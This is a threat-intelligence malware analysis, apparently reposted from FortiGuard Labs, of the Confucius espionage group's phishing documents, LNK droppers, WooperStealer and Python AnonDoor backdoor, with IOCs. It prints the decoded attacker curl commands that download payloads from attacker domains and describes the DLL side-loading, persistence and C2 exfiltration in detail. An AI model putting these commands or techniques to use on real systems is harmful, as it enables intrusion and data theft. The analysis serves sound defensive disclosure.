The Confucius Group

13736646684?profile=RESIZE_400xThe Confucius group is a long-running cyber-espionage actor operating primarily across South Asia.  First identified in 2013, the group is believed to have links to state-sponsored operations in the region.  Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries, especially in Pakistan, using spear-phishing and malicious documents as initial access vectors.  Recent campaigns have highlighted a sharp evolution in tactics, shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor.  This progression underscores Confucius’ adaptability and the growing sophistication of state-aligned malware campaigns in the region.

Over the past several months, our friends at FortiGuard Labs have observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers.  The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities.  Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness.  In this article, Fortinet will provide a chronological walkthrough of Confucius’ recent activity.


13739182079?profile=RESIZE_710xFigure 1: Confucius’ activities - December 2024 – Document.ppsx Infection Chain

This phishing email campaign targeted users in Pakistan.  The message relied on authority spoofing, minimal context, and an action-oriented request to entice the recipient into opening the attachment and kick off the infection chain.

13739180467?profile=RESIZE_710xFigure 2: Phishing email

Once Document.ppsx was opened, it displayed a “Corrupted Page” message.  An embedded OLE object in slide1.xml.rels then triggered a script in the background from the remote URL greenxeonsr.info.

13739182284?profile=RESIZE_710xFigure 3: Malicious URL

The mango44NX.doc file is a VBScript that forms a compact dropper with persistence and execution staging capabilities.  The first part downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes into %LocalAppData%\Mapistub.dll using an ADODB.Stream, and then closes the stream.

13739182490?profile=RESIZE_710xFigure 4: Download DLL

It then copies C:\Windows\System32\fixmapi.exe to the directory %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it for persistence.

It finally uses a reconstructed Shell. Application COM object to launch Swom.exe to achieve DLL side-loading and execute the malicious DLL Mapistub.dll.
13739182670?profile=RESIZE_584xFigure 5: Registry setting

The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.

13739182688?profile=RESIZE_710xFigure 6: MSIL downloader

After downloading the data, it loaded the file with a hard-coded method Yretisdkjhsfkjfh.

13739182878?profile=RESIZE_710xFigure 7: Hard-coded method

Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper.  This stealer was configured to collect a wide range of file types with specific extensions: .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar.   It parses the compromised system with Directory.GetLogicalDrives and uploads stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.

13739182700?profile=RESIZE_710xFigure 8: WooperStealer - 2025 March – Invoice_Jan25.pdf.lnk Infection Chain

By early 2025, the Confucius group had shifted to using malicious LNK files in their campaigns.  During their investigation, they obtained a sample associated with the machine ID desktop-1tjntib.  It prepared a legitimate execution file, BlueAle.exe, which was copied from C:\Windows\System32\fixmapi.exe, and downloaded a malicious DLL and decoy PDF form, petricgreen.info, from a remote server.

The decoded $x command is:

curl -o ($pa + '\mapistub.dll') “hxxps://petricgreen[.]info/RPXFD38WAPR7.rko”;$j=$env:TMP + '\file.pdf'; curl -o $j “hxxps://petricgreen[.]info/BWN9ZAP.rko”;

13739183089?profile=RESIZE_710xFigure 9: LNK file

The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.

13739183270?profile=RESIZE_710xFigure 10: Registry setting

The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload.  Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.

13739183277?profile=RESIZE_710xFigure 11: MSIL downloader

The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM,, .jpeg, .JPEG.
13739183465?profile=RESIZE_584xFigure 12: Targeted directory list

Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.

13739183669?profile=RESIZE_710xFigure 13: WooperStealer

WooperStealer uses POST requests to upload stolen files with three parameters. value1 included the victim’s system identifiers (<SerialNumber>_<ComputerName>_<UserName>), value2 carried the file path, and value3 transmitted the file hash.  This hash-based check ensured that files were not uploaded multiple times.
13739183482?profile=RESIZE_584xFigure 14: Uploaded stolen file

13739183859?profile=RESIZE_584xFigure 15: Transmitting the hash of the stolen file

Based on the telemetry gathered by researchers, this attack targets users in Pakistan.


13739184273?profile=RESIZE_584xFigure 16: Telemetry - 2025 August – New Python Backdoor

In August, analysts observed another malicious LNK file, NLC.pdf.lnk, that leveraged a similar execution technique but introduced new payloads.  The decoded command in the $x variable revealed the following activity:

curl -o ($pa + '\python313.dll') “bloomwpp.info/KM9XFY.kut”;curl -o $c “bloomwpp.info/WTBXX46.kut”;$j=$env:TMP + '\file.pdf'; curl -o $j “bloomwpp.info/JRC89.kut”;

It applies a long numeric array that is piped through %{[char]($_-217)} to reconstruct a script, which it then executes with IEX.  It then fetches data from bloomwpp.info and writes it to %LocalAppData% using the filenames python313.dll and BlueAle.exe, along with a temporary PDF file named file.pdf.  The PDF is then opened immediately to distract the user while BlueAle.exe performs DLL side-loading to invoke the malicious python313.dll.

13739184070?profile=RESIZE_710xFigure 17: LNK file

Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor.  It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.

13739187060?profile=RESIZE_710xFigure 18: MSIL downloader
13739187070?profile=RESIZE_400xFigure 19: Preparing the Python execution path

It then constructs a remote URL, hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes via a synchronous GetByteArrayAsync call, and writes the received bytes to a file named winresume.pyc under the current user’s %LOCALAPPDATA% directory.  After writing the file, it marks the file hidden using FileAttributes.Hidden.
13739186895?profile=RESIZE_400xFigure 20: Entry point

It constructs the target file path string %LOCALAPPDATA%\winresume.pyc and then uses a scheduled task to create a task named NetPolicyUpdate that executes pythonw.exe from a Scoop install from the previous PowerShell script %USERPROFILE%\scoop\apps\python\current\pythonw.exe, using the .pyc as an argument every 5 minutes.  It then prepares this task for persistence to conceal its attack beyond the previous registry setting and acts as a stealthy launcher as it has no console window.
13739187086?profile=RESIZE_400xFigure 21: Persistence setting preparation

13739187095?profile=RESIZE_400xFigure 22: Scheduled task

The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.

13739187655?profile=RESIZE_584xFigure 23: PYC version of AnonDoor

The following analysis is based on the disassembly code from the PYC file.
13739187265?profile=RESIZE_400xFigure 24: Disassembly code of the PYC file

By dropping a timestamp into %TEMP%\wctDD1A.tmp, AnonDoor ensures its heavier tasks run at most once every 6 minutes on a host.  That reduces noise, avoids redundant exfil, and ensures more controlled timing.

13739187666?profile=RESIZE_400x
Figure 25: TEMP file to track execution time

It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions.  It derives the local egress IP and grabs the hostname and logged-in user.  It then fingerprints the OS with platform.platform().  For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip).   Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command.
13739187284?profile=RESIZE_400xFigure 26: Get system information

AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields.  The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan.  The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.


13739187484?profile=RESIZE_400xFigure 27: C2 server information
F13739187701?profile=RESIZE_584xigure 28: C2 connection

It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage.  It then walks drive letters A:\ through Z:\, checks which paths exist, and for each live volume calls GetDiskFreeSpaceExW.  It then converts bytes to GiB using an integer division of 1,073,741,824 and emits compact entries like C:476GB/ Free-120GB, joining all volume information and sending it to the C2 server with the parameter fhgfh.
13739188052?profile=RESIZE_400xFigure 29: Get the system's volume information

AnonDoor then contacts its C2 server with the parameter cuud to request further tasks.  If the server replies raw task data with anything other than the string Somethingworng1, it immediately sends a POST request back with sout=<ID>@$$@<raw_task_data>.  It then splits the data using #$$ and dispatches based on the task name.  It supports a series of commands, including CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper.  For some tasks, AnonDoor downloads another Python file from the URL inside <raw_task_data> and executes it.
13739187874?profile=RESIZE_400xFigure 30: Constructing a packet for a C2 command
13739188262?profile=RESIZE_400xFigure 31: Handling the C2 command

Take the Screenshoot command, for example.  AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen.  It then builds PNG data of the screenshot into the format of <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>. It then encodes the entire data with Base64 and sends it back to the C2 server with the parameter  SCtat.
13739187883?profile=RESIZE_400xFigure 32: Python module for Screenshoot
13739187891?profile=RESIZE_400xFigure 33: Python module for fileListing

For PasswordDumper, which we observed in September, the URL is hard-coded in the PYC file.  AnonDoor routes that task to download both helpers from bloomwpp[.]info and caches their source in memory.  

During execution, it chooses which helper to run based on the task’s target. Fohjdfj783mq9XX.py is for Firefox, and Fodkh3897mgfdjiuED.py is for Edge.
13739188281?profile=RESIZE_400xFigure 34: Dump of Firefox data
13739188080?profile=RESIZE_400xFigure 35: Dump of Edge data

Conclusion - Our analysis reveals how the Confucius group has continually evolved its techniques, adopting diverse file types as initial access vectors and chaining OLE objects, malicious scripts, LNK files, PowerShell loaders, MSIL downloaders, and heavily obfuscated payloads to evade detection.  This campaign highlights the group’s technical agility, switching between malware families, including WooperStealer, the MSIL-based AnonDoor, and its Python-based variant.

The layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility.  As threat actors persistently refine their methods to bypass defenses, maintaining vigilance against varied attack techniques is critical. FortiGuard Labs will continue to closely monitor these evolving operations, providing users with timely and comprehensive protection.[1]

IOCs

Domain:

marshmellowflowerscar.info
greenxeonsr.info
cornfieldblue.info
hauntedfishtree.info
petricgreen.info
bloomwpp.info
dropmicis.info
martkartout.info

PPSX:

c91917ff2cc3b843cf9f65e5798cd2e668a93e09802daa50e55a842ba9e505de

LNK:

5a0dd2451a1661d12ab1e589124ff8ecd2c2ad55c8f35445ba9cf5e3215f977e
4206ab93ac9781c8367d8675292193625573c2aaacf8feeaddd5b0cc9136d2d1 

DLL:

8603b9fa8a6886861571fd8400d96a705eb6258821c6ebc679476d1b92dcd09e
24b06b5caad5b09729ccaffa5a43352afd2da2c29c3675b17cae975b7d2a1e62
13ca36012dd66a7fa2f97d8a9577a7e71d8d41345ef65bf3d24ea5ebbb7c5ce1

PYC:

06b8f395fc6b4fda8d36482a4301a529c21c60c107cbe936e558aef9f56b84f6
11391799ae242609304ef71b0efb571f11ac412488ba69d6efc54557447d022f

 

This article is shared with permission at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

 

[1] https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor/

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!